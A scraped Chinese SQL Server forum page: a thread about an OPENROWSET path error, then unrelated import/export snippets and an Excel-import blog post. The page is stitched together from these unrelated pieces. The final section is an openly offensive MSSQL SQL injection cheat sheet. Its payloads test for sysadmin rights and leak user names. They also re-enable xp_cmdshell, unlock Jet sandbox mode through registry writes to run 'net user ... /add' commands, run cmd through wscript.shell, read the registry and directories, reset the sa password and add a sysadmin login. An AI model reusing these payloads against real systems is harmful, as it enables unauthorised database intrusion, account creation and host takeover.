执行这条语句有错:SELECT * FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0','C:\接口\接口程序\yhw2000.mdb';'admin';'', TblWorkBillNO)

skyclin 2005-07-16 03:29:42
但报这样一个错误:
OLE DB 提供程序 'Microsoft.Jet.OLEDB.4.0' 报错。
[OLE/DB provider returned message: 'C:\接口\接口程序\yhw2000.mdb'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。]

'C:\接口\接口程序\yhw2000.mdb'
这个文件肯定有!!
...全文
208 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
skyclin 2005-07-16
  • 打赏
  • 举报
回复
原因我大概找到了,可能是数据库引擎方面的问题,
因为在自己的机子上不能运行,但在别人的机子的能运行!!
zlp321002 2005-07-16
  • 打赏
  • 举报
回复
--简单点,就是说,在SQL_server环境中可以访问Access数据库,Oracle数据库
summerICEREDTEA 2005-07-16
  • 打赏
  • 举报
回复
OPENROWSET('Microsoft.Jet.OLEDB.4.0',
''C:\接口\接口程序\yhw2000.mdb';'Admin';'';
TblWorkBillNO)
这个代表了什么?
zlp321002 2005-07-16
  • 打赏
  • 举报
回复
--Sorry 多了一个"'",试试这个看看
SELECT *
FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0',
'C:\接口\接口程序\yhw2000.mdb';'Admin';'';
TblWorkBillNO)

zlp321002 2005-07-16
  • 打赏
  • 举报
回复
--Try
SELECT *
FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0',
''C:\接口\接口程序\yhw2000.mdb';'Admin';'';
TblWorkBillNO)
******* 导出到excel EXEC master..xp_cmdshell 'bcp SettleDB.dbo.shanghu out c:\temp1.xls -c -q -S"GNETDATA/GNETDATA" -U"sa" -P""' /*********** 导入Excel SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0', 'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions /*动态文件名 declare @fn varchar(20),@s varchar(1000) set @fn = 'c:\test.xls' set @s ='''Microsoft.Jet.OLEDB.4.0'', ''Data Source="'+@fn+'";User ID=Admin;Password=;Extended properties=Excel 5.0''' set @s = 'SELECT * FROM OpenDataSource ('+@s+')...sheet1$' exec(@s) */ SELECT cast(cast(科目编号 as numeric(10,2)) as nvarchar(255))+' ' 转换后的别名 FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0', 'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions /********************** EXCEL导到远程SQL insert OPENDATASOURCE( 'SQLOLEDB', 'Data Source=远程ip;User ID=sa;Password=密码' ).库名.dbo.表名 (列名1,列名2) SELECT 列名1,列名2 FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0', 'Data Source="c:\test.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions /** 导入文本文件 EXEC master..xp_cmdshell 'bcp dbname..tablename in c:\DT.txt -c -Sservername -Usa -Ppassword' /** 导出文本文件 EXEC master..xp_cmdshell 'bcp dbname..tablename out c:\DT.txt -c -Sservername -Usa -Ppassword' 或 EXEC master..xp_cmdshell 'bcp "Select * from dbname..tablename" queryout c:\DT.txt -c -Sservername -Usa -Ppassword' 导出到TXT文本,用逗号分开 exec master..xp_cmdshell 'bcp "库名..表名" out "d:\tt.txt" -c -t ,-U sa -P password' BULK INSERT 库名..表名 FROM 'c:\test.txt' WITH ( FIELDTERMINATOR = ';', ROWTERMINATOR = '\n' ) --/* dBase IV文件 select * from OPENROWSET('MICROSOFT.JET.OLEDB.4.0' ,'dBase IV;HDR=NO;IMEX=2;DATABASE=C:\','select * from [客户资料4.dbf]') --*/ --/* dBase III文件 select * from OPENROWSET('MICROSOFT.JET.OLEDB.4.0' ,'dBase III;HDR=NO;IMEX=2;DATABASE=C:\','select * from [客户资料3.dbf]') --*/ --/* FoxPro 数据库 select * from openrowset('MSDASQL', 'Driver=Microsoft Visual FoxPro Driver;SourceType=DBF;SourceDB=c:\', 'select * from [aa.DBF]') --*/ /**************导入DBF文件****************/ select * from openrowset('MSDASQL', 'Driver=Microsoft Visual FoxPro Driver; SourceDB=e:\VFP98\data; SourceType=DBF', 'select * from customer where country != "USA" order by country') go /***************** 导出到DBF ***************/ 如果要导出数据到已经生成结构(即现存的)FOXPRO表中,可以直接用下面的SQL语句 insert into openrowset('MSDASQL', 'Driver=Microsoft Visual FoxPro Driver;SourceType=DBF;SourceDB=c:\', 'select * from [aa.DBF]') select * from 表 说明: SourceDB=c:\ 指定foxpro表所在的文件夹 aa.DBF 指定foxpro表的文件名. /*************导出到Access********************/ insert into openrowset('Microsoft.Jet.OLEDB.4.0', 'x:\A.mdb';'admin';'',A表) select * from 数据库名..B表 /*************导入Access********************/ insert into B表 selet * from openrowset('Microsoft.Jet.OLEDB.4.0', 'x:\A.mdb';'admin';'',A表) 文件名为参数 declare @fname varchar(20) set @fname = 'd:\test.mdb' exec('SELECT a.* FROM opendatasource(''Microsoft.Jet.OLEDB.4.0'', '''+@fname+''';''admin'';'''', topics) as a ') SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0', 'Data Source="f:\northwind.mdb";Jet OLEDB:Database Password=123;User ID=Admin;Password=;')...产品 ********************* 导入 xml 文件 DECLARE @idoc int DECLARE @doc varchar(1000) --sample XML document SET @doc =' Customer was very satisfied Important Happy Customer. ' -- Create an internal representation of the XML document. EXEC sp_xml_preparedocument @idoc OUTPUT, @doc -- Execute a SELECT statement using OPENXML rowset provider. SELECT * FROM OPENXML (@idoc, '/root/Customer/Order', 1) WITH (oid char(5), amount float, comment ntext 'text()') EXEC sp_xml_removedocument @idoc ??????? /**********************Excel导到Txt****************************************/ 想用 select * into opendatasource(...) from opendatasource(...) 实现将一个Excel文件内容导入到一个文本文件 假设Excel中有两列,第一列为姓名,第二列为很行帐号(16位) 且银行帐号导出到文本文件后分两部分,前8位和后8位分开。 邹健: 如果要用你上面的语句插入的话,文本文件必须存在,而且有一行:姓名,银行账号1,银行账号2 然后就可以用下面的语句进行插入 注意文件名和目录根据你的实际情况进行修改. insert into opendatasource('MICROSOFT.JET.OLEDB.4.0' ,'Text;HDR=Yes;DATABASE=C:\' )...[aa#txt] --,aa#txt) --*/ select 姓名,银行账号1=left(银行账号,8),银行账号2=right(银行账号,8) from opendatasource('MICROSOFT.JET.OLEDB.4.0' ,'Excel 5.0;HDR=YES;IMEX=2;DATABASE=c:\a.xls' --,Sheet1$) )...[Sheet1$] 如果你想直接插入并生成文本文件,就要用bcp declare @sql varchar(8000),@tbname varchar(50) --首先将excel表内容导入到一个全局临时表 select @tbname='[##temp'+cast(newid() as varchar(40))+']' ,@sql='select 姓名,银行账号1=left(银行账号,8),银行账号2=right(银行账号,8) into '+@tbname+' from opendatasource(''MICROSOFT.JET.OLEDB.4.0'' ,''Excel 5.0;HDR=YES;IMEX=2;DATABASE=c:\a.xls'' )...[Sheet1$]' exec(@sql) --然后用bcp从全局临时表导出到文本文件 set @sql='bcp "'+@tbname+'" out "c:\aa.txt" /S"(local)" /P"" /c' exec master..xp_cmdshell @sql --删除临时表 exec('drop table '+@tbname) /********************导整个数据库*********************************************/ 用bcp实现的存储过程 /* 实现数据导入/导出的存储过程 根据不同的参数,可以实现导入/导出整个数据库/单个表 调用示例: --导出调用示例 ----导出单个表 exec file2table 'zj','','','xzkh_sa..地区资料','c:\zj.txt',1 ----导出整个数据库 exec file2table 'zj','','','xzkh_sa','C:\docman',1 --导入调用示例 ----导入单个表 exec file2table 'zj','','','xzkh_sa..地区资料','c:\zj.txt',0 ----导入整个数据库 exec file2table 'zj','','','xzkh_sa','C:\docman',0 */ if exists(select 1 from sysobjects where name='File2Table' and objectproperty(id,'IsProcedure')=1) drop procedure File2Table go create procedure File2Table @servername varchar(200) --服务器名 ,@username varchar(200) --用户名,如果用NT验证方式,则为空'' ,@password varchar(200) --密码 ,@tbname varchar(500) --数据库.dbo.表名,如果不指定:.dbo.表名,则导出数据库的所有用户表 ,@filename varchar(1000) --导入/导出路径/文件名,如果@tbname参数指明是导出整个数据库,则这个参数是文件存放路径,文件名自动用表名.txt ,@isout bit --1为导出,0为导入 as declare @sql varchar(8000) if @tbname like '%.%.%' --如果指定了表名,则直接导出单个表 begin set @sql='bcp '+@tbname +case when @isout=1 then ' out ' else ' in ' end +' "'+@filename+'" /w' +' /S '+@servername +case when isnull(@username,'')='' then '' else ' /U '+@username end +' /P '+isnull(@password,'') exec master..xp_cmdshell @sql end else begin --导出整个数据库,定义游标,取出所有的用户表 declare @m_tbname varchar(250) if right(@filename,1)'\' set @filename=@filename+'\' set @m_tbname='declare #tb cursor for select name from '+@tbname+'..sysobjects where xtype=''U''' exec(@m_tbname) open #tb fetch next from #tb into @m_tbname while @@fetch_status=0 begin set @sql='bcp '+@tbname+'..'+@m_tbname +case when @isout=1 then ' out ' else ' in ' end +' "'+@filename+@m_tbname+'.txt " /w' +' /S '+@servername +case when isnull(@username,'')='' then '' else ' /U '+@username end +' /P '+isnull(@password,'') exec master..xp_cmdshell @sql fetch next from #tb into @m_tbname end close #tb deallocate #tb end go /************* Oracle **************/ EXEC sp_addlinkedserver 'OracleSvr', 'Oracle 7.3', 'MSDAORA', 'ORCLDB' GO delete from openquery(mailser,'select * from yulin') select * from openquery(mailser,'select * from yulin') update openquery(mailser,'select * from yulin where id=15')set disorder=555,catago=888 insert into openquery(mailser,'select disorder,catago from yulin')values(333,777) 补充: 对于用bcp导出,是没有字段名的. 用openrowset导出,需要事先建好表. 用openrowset导入,除ACCESS及EXCEL外,均不支持非本机数据导入
[SQL]将Excel表数据导入SQL Server2005的几种方法归纳 数据库 2010-07-27 11:14:26 阅读201 评论0 字号:大中小 订阅 近日在巨轮着手车间负荷数据处理,反馈回来的数据是保存在Excel文件中的,我必须将其导入SQL Server2005中,供存储过程计算。 由于之前没有将Excel数据导入SQL Server2005的经验,因此摸索着花了一天时间才搞定。下面将网上收集到的几种导入方法做个归纳。 方法一、利用SQL Server2005自带的DTS工具,手工导入: 第一步是点击开始并选择运行并输入CMD然后在命令提示符里输入DTSWIZARD。SQL Server 导入和导出向导的欢迎界面将显示出来,如下图所示:(也可以这样打开该界面:1、登录到 SQL Server Management Studio。2、在 “对象资源管理器 ”中右键单击 “管理 ”,在弹出列表中单击 “导入数据 ”。)   当你点击下一步按钮时,它将进入选择数据源向导界面。用户应该选择数据源为Microsoft Office 12.0 Access Database Engine OLE DB Provider 然后在向导界面中点击属性…按钮,它将弹出数据链接属性界面。在所有标签页中,双击数据源属性值并输入电子数据表的位置,例如“C:\Excel2007\Import\SampleData.xlsx”作为导入数据的数据源的Microsoft Office Excel 2007文件名称和路径。然后双击扩展属性并选择Excel 12.0作为属性值。   到Microsoft Office Excel 2007的连接可以通过点击测试连接按钮来进行测试,如下图所示:   在下一个页面中,数据源需要选为SQL Native Client,因为数据将导入到SQL Server 2005。然后你需要选择数据所要导入的服务器名称,并需要配置合适的验证模式,它之后跟着数据库名称。  在这个例子中,我们将使用windows验证连接到本地SQL Server实例,所使用的数据库将是ImportExcel。   在Specify Table Copy or Query(指定表复制或查询)向导界面中,选择copy data from one or more tables or views(从一个或多个表或视图复制数据)选项,并继续这个向导到下一个界面。   在Select Source Table and Views(选择源表和视图)向导界面中,用户需要在源中选择雇员电子数据表,然后在目标中就可以看到ImportExcel.dbo.Employee了。之后点击Edit Mappings…(编辑匹配…),扫描电子数据表中的可用数据,如果数据类型与SQL Server所建议的不同的话那么指定数据类型。   在Save and Execute Package(保存和执行包)向导界面中,有两个选项叫做Execute Immediately(立即执行)和Save SSIS Package as file system(保存SSIS包为文件系统)。你可以选择任何一个选项然后点击Finish(完成)按钮来运行和结束这个包配置。 方法二、在查询分析器里,直接写 SQL语句: 1、如果是导入数据到现有表,则采用 INSERT INTO 表 SELECT * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0' ,'Excel 5.0;HDR=YES;DATABASE=c:\test.xls',sheet1$) 的形式 2、如果是导入数据并新增表,则采用 SELECT * INTO 表 FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0' ,'Excel 5.0;HDR=YES;DATABASE=c:\test.xls',sheet1$) 的形式。 以上语句是将 EXCEL文件里 SHEET1工作表中所有的列都读进来,如果只想导部分列,可以 INSERT INTO 表 (a1,a2,a3) SELECT a1,a2,a3 FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0' ,'Excel 5.0;HDR=YES;DATABASE=c:\test.xls',sheet1$) 其实可以将 OPENROWSET('MICROSOFT.JET.OLEDB.4.0' ,'Excel 5.0;HDR=YES;DATABASE=c:\test.xls',sheet1$)当成一个表,例如我就写过这样一个句子: INSERT INTO eval_channel_employee(channel,employee_id) SELECT CASE a.渠道 WHEN 'DIY' THEN 1 WHEN 'RDC' THEN 0 WHEN 'KCM' THEN 2 ELSE 3 END ,b.id FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0' ,'Excel 5.0;HDR=YES;DATABASE=c:\temp\name.xls',sheet1$) AS a,pers_employee b WHERE a.员工编码 =b.code 不管是哪种方式,哪种途径,系统都会默认将第一行上的内容作为字段名。 3、利用C#自己开发数据导入小工具 //连接串 string strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" + [EXCEL文件,含路径] + ";"; OleDbConnection conn = new OleDbConnection(strConn); conn.Open(); DataTable dtSchema = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new object[] {null, null, null, "TABLE"}); DataSet ds = new DataSet(); //一个EXCEL文件可能有多个工作表,遍历之 foreach( DataRow dr in dtSchema.Rows ) { string table = dr["TABLE_NAME"].ToString(); string strExcel = "SELECT * FROM [" + table + "]"; ds.Tables.Add(table); OleDbDataAdapter myCommand = new OleDbDataAdapter(strExcel,conn); myCommand.Fill(ds,table); } conn.Close(); 这样,读取出来的数据就藏在 DataSet里了。 采用这种方式,数据库所在机器不必装有 EXCEL。 总结: 当Excel表中数据完整时,利用SQL自带的导入工具手工导入比较方便。当数据不完整或数据格式对应不上时,使用导入工具会出错,利用SQL查询语句就更便捷。当结合以上两种方法的优点,利用C#自己开发出数据导入工具是最佳选择。
常用的一些命令: 我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 数字类型 and char(124)%2Buser%2Bchar(124)=0 字符类型 ' and char(124)%2Buser%2Bchar(124)=0 and ''=' 搜索类型 ' and char(124)%2Buser%2Bchar(124)=0 and '%'=' 爆用户名 and user>0 ' and user>0 and ''=' 检测是否为SA权限 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 检测是不是MSSQL数据库 and exists (select * from sysobjects);-- 检测是否支持多行 ;declare @d int;-- 恢复 xp_cmdshell ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') //----------------------- // 执行命令 //----------------------- 首先开启沙盘模式: exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 然后利用jet.oledb执行系统命令 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') 执行命令 ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' 判断xp_cmdshell扩展存储过程是否存在: http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 写注册表 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 REG_SZ 读注册表 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' 读取目录内容 exec master..xp_dirtree 'c:\winnt\system32\',1,1 数据库备份 backup database pubs to disk = 'c:\123.bak' //爆出长度 And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- 更改sa口令方法:用sql综合利用工具连接后,执行命令: exec sp_password NULL,'新密码','sa' 添加和删除一个SA权限的用户test: exec master.dbo.sp_addlogin test,ptlove exec master.dbo.sp_addsrvrolemember test,sysadmin

27,579

社区成员

发帖
与我相关
我的任务
社区描述
MS-SQL Server 应用实例
社区管理员
  • 应用实例社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧